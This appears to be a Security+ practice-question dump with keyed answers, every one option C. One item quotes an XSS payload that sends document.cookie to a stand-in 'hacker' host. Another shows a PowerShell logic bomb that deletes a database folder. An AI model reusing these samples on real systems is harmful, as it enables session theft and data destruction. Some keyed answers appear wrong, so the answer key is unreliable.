Sara, a security architect, has developed a framework in which several authentication servers work together to increase processing power for an application. Which of the following does this represent? A. Warm site B. Load balancing C. Clustering D. RAID
C. Clustering
An administrator has a network subnet dedicated to a group of users. Due to concerns regarding data and network security, the administrator desires to provide network access for this group only. Which of the following would BEST address this desire? A. Install a proxy server between the users' computers and the switch to filter inbound network traffic. B. Block commonly used ports and forward them to higher and unused port numbers. C. Configure the switch to allow only traffic from computers based upon their physical address. D. Install host-based intrusion detection software to monitor incoming DHCP Discover requests.
C. Configure the switch to allow only traffic from computers based upon their physical address.
Which of the following security strategies allows a company to limit damage to internal systems and provides loss control? A. Restoration and recovery strategies B. Deterrent strategies C. Containment strategies D. Detection strategies
C. Containment strategies
During a lessons learned meeting regarding a previous incident, the security team receives a follow-up action item with the following requirements: Allow authentication from within the United States anytime Allow authentication if the user is accessing email or a shared file system. Do not allow authentication if the AV program is two days out of date Do not allow authentication if the location of the device is in two specific countries Given the requirements, which of the following mobile deployment authentication types is being utilized? A. Geofencing authentication B. Two-factor authentication C. Context-aware authentication D. Biometric authentication
C. Context-aware authentication
Which of the following is being tested when a company's payroll server is powered off for eight hours? A. Succession plan B. Business impact document C. Continuity of operations plan D. Risk assessment plan
C. Continuity of operations plan
A security engineer implements multiple technical measures to secure an enterprise network. The engineer also works with the Chief Information Officer (CIO) to implement policies to govern user behavior. Which of the following is the security engineer executing? A. Baselining B. Mandatory access control C. Control diversity D. System hardening
C. Control diversity
Matt, the IT Manager, wants to create a new network available to virtual servers on the same hypervisor, and does not want this network to be routable to the firewall. How could this BEST be accomplished? A. Create a VLAN without a default gateway. B. Remove the network from the routing table. C. Create a virtual switch. D. Commission a stand-alone switch.
C. Create a virtual switch.
A vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and registry values known to be associated with system vulnerabilities. Which of the following BEST describes the type of scan being performed? A. Non-intrusive B. Authenticated C. Credentialed D. Active
C. Credentialed
An employee is having issues when attempting to access files on a laptop. The machine was previously running slow, and many files were not accessible. The employee is not able to access the hard drive the next day, and all file names were changed to some random names. Which of the following BEST represents what compromised the machine? A. Ransomware B. Worm C. Crypto-malware D. RAT
C. Crypto-malware
Which of the following is the primary security concern when deploying a mobile device on a network? A. Strong authentication B. Interoperability C. Data security D. Cloud storage technique
C. Data security
A company decides to implement a BYOD policy and is concerned about how to implement the proper controls to secure its mobile devices. Which of the following security approaches can the company implement to ensure its mobile devices are secured? A. Use FDE with key escrow. B. Allow the use of the camera, the microphone, and removable media. C. Deploy a custom SEAndroid policy. D. Implement security awareness training. E. Configure a customer MAC policy.
C. Deploy a custom SEAndroid policy.
An employee has been writing a secure shell around software used to secure executable files. The employee has conducted the appropriate self-test and is ready to move the software into the next environment. Within which of the following environments is the employee currently working? A. Staging B. Test C. Development D. Production
C. Development
Matt, a security analyst, needs to select an asymmetric encryption method that allows for the same level of encryption strength with a lower key length than is typically necessary. Which of the following encryption methods offers this capability? A. Twofish B. Diffie-Hellman C. ECC D. RSA
C. ECC
An auditor confirms the risk associated with a Windows-specific vulnerability, which was discovered by the company's security tool, does not apply due to the server running a LInux OS. Which of the following does this BEST describe? A. Inherent risk B. Attack vector C. False positive D. Remediation
C. False positive
Which of the following can result in significant administrative overhead from incorrect reporting? A. Job rotation B. Acceptable usage policies C. False positives D. Mandatory vacations
C. False positives
A bank uses a wireless network to transmit credit card purchases to a billing system. Which of the following would be MOST appropriate to protect credit card information from being accessed by unauthorized individuals outside of the premises? A. Air gap B. Infrared detection C. Faraday cage D. Protected distributions
C. Faraday cage
The Chief Information Security Officer (CISO) of an organization has tasked the security analysis team with researching and developing a multifactor authentication alternative to the existing single-factor version. The team decides that multifactor, for this organization, will mean three separate and distinct authentication methods. Which of the following options BEST meets this requirement? A. Retina scan, blood sample, token B. Token, certificate, voice recognition C. Fingerprint, token, challenge question D. PIV, token, challenge question
C. Fingerprint, token, challenge question
Joe, a backup administrator, wants to implement a solution that will reduce the restoration time of physical servers. Which of the following is the BEST method for Joe to use? A. Differential B. Incremental C. Full D. Snapshots
C. Full
A security engineer wants to add SSL to the public server. Which of the following would be the FIRST step to implement the SSL certificate? A. Download the web certificate. B. Install the intermediate certificate. C. Generate a CSR. D. Encrypt the private key.
C. Generate a CSR.
An organization has hired a new remote workforce. Many new employees are reporting that they are unable to access the shared network resources while traveling. They need to be able to travel to and from different locations on a weekly basis. Shared offices are retained at the headquarters location. The remote workforce will have identical file and system access requirements, and must also be able to log in to the headquarters location remotely. Which of the following BEST represent how the remote employees should have been set up initially? (Select TWO) A. User-based access control B. Shared accounts C. Group-based access control D. Roaming profiles E. Individual accounts F. Location-based policies
C. Group-based access control D. Roaming profiles
Which of the following could cause a browser to display the message below? "The security certificate presented by this website was issued for a different website's address." A. The website certificate was issued by a different CA than what the browser recognizes in its trusted CAs. B. The website is using a wildcard certificate issued for the company's domain. C. HTTPS://127.0.01 was used instead of HTTPS://localhost. D. The website is using an expired self signed certificate.
C. HTTPS://127.0.01 was used instead of HTTPS://localhost.
Which of the following should be connected to the fire alarm system in order to help prevent the spread of a fire in a server room without data loss to assist in an FM-200 deployment? A. Water base sprinkler system B. Electrical C. HVAC D. Video surveillance
C. HVAC
An organization electronically processes sensitive data within a controlled facility. The Chief Information Security Officer (CISO) wants to limit emissions from emanating from the facility. Which of the following mitigates this risk? A. Upgrading facility cabling to a higher standard of protected cabling to reduce the likelihood of emission spillage. B. Hardening the facility through the use of secure cabinetry to block emissions. C. Hardening the facility with a Faraday cage to contain emissions produced from data processing. D. Employing security guards to ensure unauthorized personnel remain outside of the facility.
C. Hardening the facility with a Faraday cage to contain emissions produced from data processing.
A company is trying to implement physical deterrent controls to improve the overall security posture of their data center. Which of the following BEST meets their goal? A. Visitor logs B. Firewall C. Hardware locks D. Environmental monitoring
C. Hardware locks
A Chief Information Security Officer (CISO) is concerned about insider threats compromising credentials related to service accounts on internal servers. A security analyst is tasked with developing a solution that will allow for the collection and analysis of log data in a simulated environment, which represents the production environment. Which of the following solutions would BEST satisfy the CISO's requirements? A. Bastion host B. Evil twin C. Honeynet D. Vampire tap E. Script kiddie
C. Honeynet
Ann, a user, reports she is unable to access an application from her desktop. A security analyst verifies Ann's access and checks the SIEM for any errors. The security analyst reviews the log file from Ann's system and notices the following output: 2017--08-21 10:48:12 DROP TCP 172.20.89.232 239.255.255.255 443 1900 250 -------- RECEIVE 2017--08-21 10:48:12 DROP UDP 192.168.72.205 239.255.255.255 443 1900 250 -------- RECEIVE Which of the following is MOST likely preventing Ann from accessing the application from the desktop? A. Web application firewall B. DLP C. Host-based firewall D. UTM E. Network-based firewall
C. Host-based firewall
An organization wants to ensure network access is granted only after a user or device has been authenticated. Which of the following should be used to achieve this objective for both wired and wireless networks? A. CCMP B. PKCS#12 C. IEEE 802.1X D. OCSP
C. IEEE 802.1X
Which of the following pseudocodes can be used to handle program exceptions? A. If program detects another instance of itself, then kill program instance. B. If user enters invalid input, then restart program. C. If program module crashes, then restart program module. D. If user's input exceeds buffer length, then truncate the input.
C. If program module crashes, then restart program module.
A help desk technician receives a phone call from an individual claiming to be an employee of the organization and requesting assistance to access a locked account. The help desk technician asks the individual to provide proof of identity before access can be granted. Which of the following types of attack is the caller performing? A. Phishing B. Shoulder surfing C. Impersonation D. Dumpster diving
C. Impersonation
A company is deploying a file-sharing protocol across a network and needs to select a protocol for authenticating clients. Management requests that the service be configured in the most secure way possible. The protocol must also be capable of mutual authentication, and support SSO and smart card logons. Which of the following would BEST accomplish this task? A. Store credentials in LDAP. B. Use NTLM authentication. C. Implement Kerberos. D. Use MSCHAP authentication.
C. Implement Kerberos.
During an assessment of a manufacturing plant, security analyst finds several end-of-life programmable logic controllers (PLCs), which have firmware that was last updated three years ago and known vulnerabilities. Which of the following BEST mitigates the risks associated with the PLCs? A. Deploy HIDS on each device. B. Remove the PLCs from the manufacturing infrastructure. C. Implement network segmentation to isolate the devices. D. Perform file integrity monitoring against the devices.
C. Implement network segmentation to isolate the devices.
A security administrator is developing a methodology for tracking staff access to patient data. Which of the following would be the BEST method of creating audit trails for usage reports? A. Deploy file integrity checking B. Restrict access to the database by following the principle of least privilege C. Implementing a database activity monitoring system D. Created automated alerts on the IDS system for the database server
C. Implementing a database activity monitoring system
Which of the following is being described when a security professional develops and publishes a password policy specifically tailored to a company, and enforces the policy through technical means? A. Applying vendor-specific configurations. B. Developing regulatory frameworks. C. Implementing security control diversity. D. Creating security benchmarks.
C. Implementing security control diversity.
Matt, a developer, recently attended a workshop on a new application. The developer installs the new application on a production system to test the functionality. Which of the following is MOST likely affected? A. Application design B. Application security C. Initial baseline configuration D. Management of interfaces
C. Initial baseline configuration
A security manager discovers the most recent vulnerability scan report illustrates low-level, non-critical findings. Which of the following scanning concepts would BEST report critical threats? A. Non-credentialed scan B. Compliance scan C. Intrusive scan D. Application scan
C. Intrusive scan
Joe, a senior systems administrator, must leave for a family emergency. While Joe is absent, another systems administrator discovers Joe stole confidential company information. Which of the following organizational procedures would have detected this breach sooner? A. Background check B. Separation of duties C. Job rotation D. Rules of behavior E. Non-disclosure agreement
C. Job rotation
A security administrator has installed a new KDC for the corporate environment. Which of the following authentication protocols is the security administrator planning to implement across the organization? A. LDAP B. RADIUS C. Kerberos D. XTACACS
C. Kerberos
A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC addresses to be visible across the tunnel? A. Tunnel mode IPSec B. Transport mode VPN IPSec C. L2TP D. SSL VPN
C. L2TP
A network administrator receives a support ticket from the security operations team to implement secure access to the domain. The support ticket contains the following information: Source: 192.168.1.137 Destination: 10.113.10.8 Protocol: TCP Ports: 636 Time-of-day restriction: None Proxy bypass required: Yes'' Which of the following is being requested to be implemented? A. DNSSEC B. S/MIME C. LDAPS D. RDP
C. LDAPS
The Chief Information Security Officer (CISO) of a university is concerned about potential transmission of usernames and passwords in cleartext when authenticating to a directory server. Which of the following would BEST mitigate the CISO's concerns? A. SFTP B. SNMPv3 C. LDAPS D. SMB
C. LDAPS
A systems administrator has created network file shares for each department with associated security groups for each role within the organization. Which of the following security concepts is the administrator implementing? A. Separation of duties B. Permission auditing C. Least privilege D. Standard naming convention
C. Least privilege
One of the system administrators at a company is assigned to maintain a secure computer lab. The administrator has rights to configure machines, install software, and perform user account maintenance. However, the administrator cannot add new computers to the domain, because that requires authorization from the Information Assurance Officer. This is an example of which of the following? A. Mandatory access B. Rule-based access control C. Least privilege D. Job rotation
C. Least privilege
A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server: $members = GetADGroupMember -Identity "Domain Admins" -Recursive | Select - ExpandProperty name if ($members -notcontains "JohnDoe"){ Remove-Item -path C:\Database -recurse -force } Which of the following did the security administrator discover? A. Ransomeware B. Backdoor C. Logic bomb D. Trojan
C. Logic bomb
Ann, a security administrator, has concerns regarding her company's wireless network. The network is open and available for visiting prospective clients in the conference room, but she notices that many more devices are connecting to the network than should be. Which of the following would BEST alleviate Ann's concerns with minimum disturbance of current functionality for clients? A. Enable MAC filtering on the wireless access point. B. Configure WPA2 encryption on the wireless access point. C. Lower the antenna's broadcasting power. D. Disable SSID broadcasting.
C. Lower the antenna's broadcasting power.
Which of the following is the GREATEST security risk of two or more companies working together under a Memorandum of Understanding? A. Budgetary considerations may not have been written into the MOU, leaving an entity to absorb more cost than intended at signing. B. MOUs have strict policies in place for services performed between the entities and the penalties for compromising a partner are high. C. MOUs are generally loose agreements and therefore may not have strict guidelines in place to protect sensitive data between the two entities. D. MOUs between two companies working together cannot be held to the same legal standards as SLAs.
C. MOUs are generally loose agreements and therefore may not have strict guidelines in place to protect sensitive data between the two entities.
A security administrator implements access controls based on the security classification of the data and needto-know information. Which of the following BEST describes this level of access control? A. Implicit deny B. Role-based Access Control C. Mandatory Access Controls D. Least privilege
C. Mandatory Access Controls
A security team has established a security awareness program. Which of the following would BEST prove the success of the program? A. Policies B. Procedures C. Metrics D. Standards
C. Metrics
A distributed denial of service attack can BEST be described as: A. Invalid characters being entered into a field in a database application. B. Users attempting to input random or invalid data into fields within a web browser application. C. Multiple computers attacking a single target in an organized attempt to deplete its resources. D. Multiple attackers attempting to gain elevated privileges on a target system.
C. Multiple computers attacking a single target in an organized attempt to deplete its resources.
A security team has deployed a new UTM to connect different segments of the corporate network. In addition to the UTM, each host has its own firewall and HIPS. The new UTM implements many of the same protections as the host-based firewall and HIPS, but the security team plans to leave both of these protections in place. Which of the following BEST describes the reason for this redundancy? A. Having multiple security devices can result in faster performance. B. The UTM cannot protect against threats from outside the network. C. Multiple forms of protection is preferred over single points of failure. D. A UTM cannot perform malware analysis, but a HIPS can.
C. Multiple forms of protection is preferred over single points of failure.
Mike, a network administrator, has been asked to passively monitor network traffic to the company's sales websites. Which of the following would be BEST suited for this task? A. HIDS B. Firewall C. NIPS D. Spam filter
C. NIPS
This form of wireless communications has three modes of operation peer-to-peer mode, read/write mode, and card emulation: A. Wi-Fi B. Bluetooth C. Near-Field Communication (NFC) D. Biometrics
C. Near-Field Communication (NFC)
A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using an old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company. The administrator wants to implement a solution that will eradicate the current worm and any future attacks that may be using zero-day vulnerabilities. Which of the following would BEST meet the requirements when implemented? A. Host-based firewall B. Enterprise patch management system C. Network-based intrusion prevention system D. Application blacklisting E. File integrity checking
C. Network-based intrusion prevention system
Which of the following is a penetration tester performing when running an SMB NULL session scan of a host to determine valid usernames and share names? A. Credentialed vulnerability scan B. Passive scan C. Non-credentialed scan D. Non-intrusive vulnerability testing E. Penetration testing
C. Non-credentialed scan
A web developers improves client access to the company's REST API. Authentication needs to be tokenized but not expose the client's password. Which of the following methods would BEST meet the developer's requirements? A. SAML B. LDAP C. OAuth D. Shibboleth
C. OAuth
Which of the following uses tokens between the identity provider and the service provider to authenticate and authorize users to resources? A. RADIUS B. Kerberos C. OAuth D. MSCHAP
C. OAuth
Which of the following protocols is used to validate whether trust is in place and accurate by returning responses of either "good", "unknown", or "revoked"? A. CRL B. PKI C. OCSP D. RA
C. OCSP
Attackers have been using revoked certificates for MITM attacks to steal credentials from employees of Company.com. Which of the following options should Company.com implement to mitigate these attacks? A. Captive portal B. Extended validation certificate C. OCSP stapling D. Object identifiers E. Key escrow
C. OCSP stapling
A security researcher wants to reverse engineer an executable file to determine if it is malicious. The file was found on an underused server and appears to contain a zero-day exploit. Which of the following can the researcher do to determine if the file is malicious in nature? A. TCP/IP socket design review B. Executable code review C. OS Baseline comparison D. Software architecture review
C. OS Baseline comparison
A department head at a university resigned on the first day of spring semester. It was subsequently determined that the department head deleted numerous files and directories from the server-based home directory while the campus was closed. Which of the following policies or procedures could have prevented this from occurring? A. Time-of-day restrictions B. Permissions auditing and review C. Offboarding D. Account expiration
C. Offboarding
Which of the following implementation steps would be appropriate for a public wireless hot-spot? A. Reduce power level B. Disable SSID broadcast C. Open system authentication D. MAC filter
C. Open system authentication
Three of the primary security control types that can be implemented are. A. Supervisory, subordinate, and peer. B. Personal, procedural, and legal. C. Operational, technical, and management. D. Mandatory, discretionary, and permanent.
C. Operational, technical, and management.
This type of firewall passes or blocks traffic to specific ports or IP addresses based on predetermined rules? A. Stateful inspection B. Proxy C. Packet-filtering D. Unified Threat Management
C. Packet-filtering
Despite having implemented password policies, users continue to set the same weak passwords and reuse old passwords. Which of the following technical controls would help prevent these policy violations? (Select TWO) A. Password expiration B. Password length C. Password complexity D. Password history E. Password lockout
C. Password complexity D. Password history
A security administrator wants to check user password complexity. Which of the following is the BEST tool to use? A. Password history B. Password logging C. Password cracker D. Password hashing
C. Password cracker
An administrator finds that non-production servers are being frequently compromised, production servers are rebooting at unplanned times and kernel versions are several releases behind the version with all current security fixes. Which of the following should the administrator implement? A. Snapshots B. Sandboxing C. Patch management D. Intrusion detection system
C. Patch management
After a recent security breach at a hospital, it was discovered that nursing staff members, who were working the overnight shift, searched for and accessed private health information for local celebrities who were patients at the hospital. Which of the following would have enabled the hospital to discover this behavior BEFORE a breach occurred? A. Time-of-day restrictions B. Usage reviews C. Periodic permission audits D. Location-based policy enforcement
C. Periodic permission audits
A company has won an important government contract. Several employees have been transferred from their existing projects to support a new contract. Some of the employees who have transferred will be working long hours and still need access to their project information to transition work to their replacements. Which of the following should be implemented to validate that the appropriate offboarding process has been followed? A. Seperation of duties B. Time-of-day restrictions C. Permission auditing D. Mandatory access control
C. Permission auditing
Due to a configuration error, sales and marketing staff were able to access highly sensitive, commercial R&D information for a period of five days before the issue was discovered by an automated system, corrected, and flagged for review. Inspection of logs and monitoring systems by security analysts indicated that no sensitive data was accessed. Based on this scenario, which of the following should a risk manager be MOST concerned about? A. Data exfiltration B. Inside threat C. Permission issues D. Baseline deviation
C. Permission issues
An analyst generates the following color-coded table shown in the exhibit to help explain the risk of potential incidents in the company. The vertical axis indicates the likelihood of an incident, while the horizontal axis indicates the impact. High Yellow Red Pink Medium Green Yellow Red Low Green Green Yellow Low Medium High Which of the following is this table an example of? A. Internal threat assessment B. Privacy impact assessment C. Qualitative risk assessment D. Supply chain assessment
C. Qualitative risk assessment
A small business needs to incorporate fault tolerance into their infrastructure to increase data availability. Which of the following options would be the BEST solution at a minimal cost? A. Clustering B. Mirrored server C. RAID D. Tape backup
C. RAID
A security analyst is reviewing firewall logs while investigating a compromised web server. The following ports appear in the log: 22, 25, 445, 1433, 3128, 3389, 6667 Which of the following protocols was used to access the server remotely? A. LDAP B. HTTP C. RDP D. HTTPS
C. RDP
A datacenter requires that staff be able to identify whether or not items have been removed from the facility. Which of the following controls will allow the organization to provide automated notification of item removal? A. CCTV B. Environmental monitoring C. RFID D. EMI shielding
C. RFID
A security administrator is choosing an algorithm to generate password hashes. Which of the following would offer the BEST protection against offline brute force attacks? A. MD5 B. 3DES C. RIPEMD D. SHA-1
C. RIPEMD
Which of the following defines a business goal for system restoration and acceptable data loss? A. MTTR B. MTBF C. RPO D. Warm site
C. RPO
Which of the following describes the maximum amount of time a mission essential function can operate without the systems it depends on before significantly impacting the organization? A. MTBF B. MTTR C. RTO D. RPO
C. RTO
Which of the following uses precomputed hashes to guess passwords? A. Iptables B. NAT tables C. Rainbow tables D. ARP tables
C. Rainbow tables
Which of the following can be used on a smartphone to BEST protect against sensitive data loss if the device is stolen? (Select TWO). A. Tethering B. Screen lock PIN C. Remote wipe D. Email password E. GPS tracking F. Device encryption
C. Remote wipe F. Device encryption
Which of the following BEST describes an important security advantage yielded by implementing vendor diversity? A. Sustainability B. Homogeneity C. Resiliency D. Configurability
C. Resiliency
A company is deploying smartphones for its mobile salesforce. These devices are for personal and business use but are owned by the company. Sales personnel will save new customer data via a custom application developed for the company. This application will integrate with the contact information stored in the smartphones and will populate new customer records onto it. The customer application's data is encrypted at rest, and the application's connection to the back office system is considered secure. The Chief Information Security Officer (CISO) has concerns that customer contact information may be accidentally leaked due to the limited security capabilities of the devices and the planned controls. Which of the following will be the MOST efficient security control to implement to lower this risk? A. Implement a mobile data loss agent on the devices to prevent any user manipulation with the contact information. B. Restrict screen capture features on the devices when using the custom application and the contact information. C. Restrict contact information storage data flow so it is only shared with the customer application. D. Require complex passwords for authentication when accessing the contact information.
C. Restrict contact information storage data flow so it is only shared with the customer application.
A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install? A. Vulnerability scanner B. Network-based IDS C. Rogue system detection D. Configuration compliance scanner
C. Rogue system detection
An incident response analyst in a corporate security operations center receives a phone call from a SOC analyst. The SOC analyst explains that the help desk reimaged a workstation that was suspected of being infected with an unknown type of malware; however, even after reimaging, the host continued to generate SIEM alerts. Which of the following types of malware is MOST likely responsible for producing the SIEM alerts? A. Ransomware B. Logic bomb C. Rootkit D. Adware
C. Rootkit
The system administrator has deployed updated security controls for the network to limit risk of attack. The security manager is concerned that controls continue to function as intended to maintain appropriate security posture. Which of the following risk mitigation strategies is MOST important to the security manager? A. User permissions B. Policy enforcement C. Routine audits D. Change management
C. Routine audits
A company was recently audited by a third party. The audit revealed the company's network devices were transferring files in the clear. Which of the following protocols should the company use to transfer files? A. HTTPS B. LDAPS C. SCP D. SNMPv3
C. SCP
Which of the following protocols operates at the HIGHEST level of the OSI model? A. ICMP B. IPSec C. SCP D. TCP
C. SCP
Which of the following protocols allows for secure transfer of files? (Select TWO). A. ICMP B. SNMP C. SFTP D. SCP E. TFTP
C. SFTP D. SCP
A security technician is configuring a new access switch. The switch will be managed through software that will send status reports and logging details to a central management console. Which of the following protocols should the technician configure to BEST meet these requirements? (Select TWO). A. SSL/TLS B. S/MIME C. SNMPv3 D. Syslog E. SRTP F. Shibboleth
C. SNMPv3 D. Syslog
During a breach investigation, you notice that the attacker entered the database through a web front end application by manipulating the database code to exploit a vulnerability. What is the most likely name for this type of attack? A. SQL parsing B. Database injection C. SQL injection D. Session hijacking
C. SQL injection
A vulnerability assessment indicates that a router can be accessed from default port 80 and default port 22. Which of the following should be executed on the router to prevent access via these ports? (Select TWO). A. FTP service should be disabled B. HTTPS service should be disabled C. SSH service should be disabled D. HTTP service should disabled E. Telnet service should be disabled
C. SSH service should be disabled D. HTTP service should disabled
The POODLE attack is an MITM exploit that affects: A. TLS1.0 with CBC mode cipher B. SSLv2.0 with CBC mode cipher C. SSLv3.0 with CBC mode cipher D. SSLv3.0 with ECB mode cipher
C. SSLv3.0 with CBC mode cipher
When using a cryptographic function to store a password, which of the following should be used to avoid similar output from similar passwords? A. Hashing B. Field padding C. Salting D. Key rotating
C. Salting
A software developer wants to prevent stored passwords from being easily decrypted. When the password is stored by the application, additional text is added to each password before the password is hashed. This technique is known as: A. Symmetric cryptography. B. Private key cryptography. C. Salting. D. Rainbow tables.
C. Salting.
An energy company is in the final phase of testing its new billing service. The testing team wants to use production data in the test system for stress testing. Which of the following is the BEST way to use production data without sending false notification to the customers? A. Back up and archive the production data to an external source. B. Disable notifications in the production system. C. Scrub the confidential information. D. Encrypt the data prior to the stress test.
C. Scrub the confidential information.
A security analyst is conducting a web application vulnerability scan against the company website. Which of the following is considered an intrusive scan? A. Ping sweep B. Time-delay port scanning C. Service identification D. Cipher suite order
C. Service identification
A systems administrator is configuring a new network switch for TACACS+ management and authentication. Which of the following must be configured to provide authentication between the switch and the TACACS+ server? A. 802.1X B. SSH C. Shared secret D. SNMPv3 E. CHAP
C. Shared secret
When performing the daily review of the system vulnerability scans of the network Joe, the administrator, noticed several security related vulnerabilities with an assigned vulnerability identification number. Joe researches the assigned vulnerability identification number from the vendor website. Joe proceeds with applying the recommended solution for identified vulnerability. Which of the following is the type of vulnerability described? A. Network based B. IDS C. Signature based D. Host based
C. Signature based
A user attempting to log on to a workstation for the first time is prompted for the following information before being granted access: username, password, and a four-digit security pin that was mailed to him during account registration. This is an example of which of the following? A. Dual-factor authentication B. Multifactor authentication C. Single factor authentication D. Biometric authentication
C. Single factor authentication
A security administrator has concerns about new types of media which allow for the mass distribution of personal comments to a select group of people. To mitigate the risks involved with this media, employees should receive training on which of the following? A. Peer to Peer B. Mobile devices C. Social networking D. Personally owned devices
C. Social networking
Which of the following authentication concepts is a gait analysis MOST closely associated? A. Somewhere you are B. Something you are C. Something you do D. Something you know
C. Something you do
Which of the following BEST describes the process of altering the bits of a media file to embed a hidden message? A. Encryption B. Diffusion C. Steganography D. Hashing
C. Steganography
Which of the following would be considered multifactor authentication? A. Hardware token and smart card B. Voice recognition and retina scan C. Strong password and fingerprint D. PIN and security questions
C. Strong password and fingerprint
A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist? A. Buffer overflow B. End-of-life systems C. System sprawl D. Weak configuration
C. System sprawl
A security administrator is reviewing the company's continuity plan. The plan specifies an RTO of six hours and RPO of two days. Which of the following is the plan describing? A. Systems should be restored within six hours and no later than two days after the incident. B. Systems should be restored within two days and should remain operational for at least six hours. C. Systems should be restored within six hours with a minimum of two days worth of data. D. Systems should be restored within two days with a minimum of six hours worth of data.
C. Systems should be restored within six hours with a minimum of two days worth of data.
Which of the following is an authentication and accounting service that uses TCP for connecting to routers and switches? A. DIAMETER B. RADIUS C. TACACS+ D. Kerbero
C. TACACS+
Pete needs to open ports on the firewall to allow for secure transmission of files. Which of the following ports should be opened on the firewall? A. TCP 23 B. UDP 69 C. TCP 22 D. TCP 21
C. TCP 22
An organization's Chief Information Officer (CIO) recently received an email from human resources that contained sensitive information. The CIO noticed the email was sent via unsecure means. A policy has since been put into place stating all emails must be transmitted using secure technologies. Which of the following should be implemented to address the new policy? A. HTTPS B. SMTP C. TLS D. SFTP
C. TLS
Which of the following protocols is used to authenticate the client and server's digital certificate? A. PEAP B. DNS C. TLS D. ICMP
C. TLS
Which of the following is a hardware based encryption device? A. EFS B. TrueCrypt C. TPM D. SLE
C. TPM
A security auditor is testing perimeter security in a building that is protected by badge readers. Which of the following types of attacks would MOST likely gain access? A. Phishing B. Man-in-the-middle C. Tailgating D. Watering hole E. Shoulder surfing
C. Tailgating
You observe a delivery person entering your building by following an employee through a locked door into a secure facility. Which term best describes this type of attack: A. Shoulder surfing B. Reciprocity C. Tailgating D. Whaling
C. Tailgating
A new application needs to be deployed on a virtual server. The virtual server hosts a SQL server that is used by several employees. Which of the following is the BEST approach for implementation of the new application on the virtual server? A. Take a snapshot of the virtual server after installing the new application and store the snapshot in a secure location. B. Generate a baseline report detailing all installed applications on the virtualized server after installing the new application. C. Take a snapshot of the virtual server before installing the new application and store the snapshot in a secure location. D. Create an exact copy of the virtual server and store the copy on an external hard drive after installing the new application.
C. Take a snapshot of the virtual server before installing the new application and store the snapshot in a secure location.
To help prevent unauthorized access to PCs, a security administrator implements screen savers that lock the PC after five minutes of inactivity. Which of the following controls is being described in this situation? A. Management B. Administrative C. Technical D. Operational
C. Technical
Which statement is TRUE about the operation of a packet sniffer? A. It can only have one interface on a management network. B. They are required for firewall operation and stateful inspection. C. The Ethernet card must be placed in promiscuous mode. D. It must be placed on a single virtual LAN interface.
C. The Ethernet card must be placed in promiscuous mode.
An attacker exploited a vulnerability on a mail server using the code below. <HTML><body onload=document.location.replace ('http://hacker/post.asp?victim&message =" + document.cookie + "<br>" + "URL:" +"document.location) ; /> </body> </HTML> Which of the following BEST explains what the attacker is doing? A. The attacker is replacing a cookie. B. The attacker is stealing a document. C. The attacker is replacing a document. D. The attacker is deleting a cookie.
C. The attacker is replacing a document.
A security analyst runs a monthly file integrity check on the main web server. When analyzing the logs, the analyst observed the following entry: File Previous hash Current hash cmd.exe c4ca6a34c5e3a0f98dc03d4f8adf56a3 a24f5a34c5e3a0f98dc03d4f8ac5c0e2 iexplore.exe b9c8e3f24b38c94a7c5f3d9d8d4e7ab3 b9c8e3f24b38c94a7c5f3d9d8d4e7ab3 No OS patches were applied to this server during this period. Considering the log output, which of the following is the BEST conclusion? A. The cmd.exe was executed on the scanned server between the two dates. An incident ticket should be created. B. The iexplore.exe was executed on the scanned server between the two dates. An incident ticket should be created. C. The cmd.exe was updated on the scanned server. An incident ticket should be created. D. The iexplore.exe was updated on the scanned server. An incident ticket should be created
C. The cmd.exe was updated on the scanned server. An incident ticket should be created.
A security administrator needs to update the OS on all the switches in the company. Which of the following MUST be done before any actual switch configuration is performed? A. The request needs to be sent to the incident management team. B. The request needs to be approved through the incident management process. C. The request needs to be approved through the change management process. D. The request needs to be sent to the change management team.
C. The request needs to be approved through the change management process.
Acme Corp has selectively outsourced proprietary business processes to ABC Services. Due to some technical issues, ABC services wants to send some of Acme Corp's debug data to a third party vendor for problem resolution. Which of the following MUST be considered prior to sending data to a third party? A. The data should be encrypted prior to transport B. This would not constitute unauthorized data sharing C. This may violate data ownership and non-disclosure agreements D. Acme Corp should send the data to ABC Services' vendor instead
C. This may violate data ownership and non-disclosure agreements
The company's sales team plans to work late to provide the Chief Executive Officer (CEO) with a special report of sales before the quarter ends. After working for several hours, the team finds they cannot save or print the reports. Which of the following controls is preventing them from completing their work? A. Discretionary access control B. Role-based access control C. Time of Day access control D. Mandatory access control
C. Time of Day access control
The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue? A. The password expired on the account and needed to be reset B. The employee does not have the rights needed to access the database remotely C. Time-of-day restrictions prevented the account from logging in D. The employee's account was locked out and needed to be unlocked
C. Time-of-day restrictions prevented the account from logging in
During a penetration test, the tester performs a preliminary scan for any responsive hosts. Which of the following BEST explains why the tester is doing this? A. To determine if the network routers are improperly forwarding request packets B. To identify the total number of hosts and determine if the network can be victimized by a DoS attack C. To identify servers for subsequent scans and further investigation D. To identify unresponsive hosts and determine if those could be used as zombies in a follow-up scan
C. To identify servers for subsequent scans and further investigation
Which of the following is the BEST reason to run an untested application in a sandbox? A. To allow the application to take full advantage of the host system's resources and storage B. To utilize the host systems antivirus and firewall applications instead of running its own protection C. To prevent the application from acquiring escalated privileges and accessing its host system D. To increase application processing speed so the host system can perform real-time logging
C. To prevent the application from acquiring escalated privileges and accessing its host system
Which of the following BEST explains why an application team might take a VM snapshot before applying patches in the production environment? A. To reduce the operational risk so application users can continue using the system while the patch is being applied in the production environment. B. To reduce security risk by having a baseline against which the patched system can be compared if the system becomes compromised. C. To reduce operational risk so the team can quickly restore the application to a previous working condition if the patch fails. D. To reduce security risk so vulnerability scans can be performed on a pre- and post-patched system and the results can be compared.
C. To reduce operational risk so the team can quickly restore the application to a previous working condition if the patch fails.
Sara, a user, downloads a keygen to install pirated software. After running the keygen, system performance is extremely slow and numerous antivirus alerts are displayed. Which of the following BEST describes this type of malware? A. Logic bomb B. Worm C. Trojan D. Adware
C. Trojan
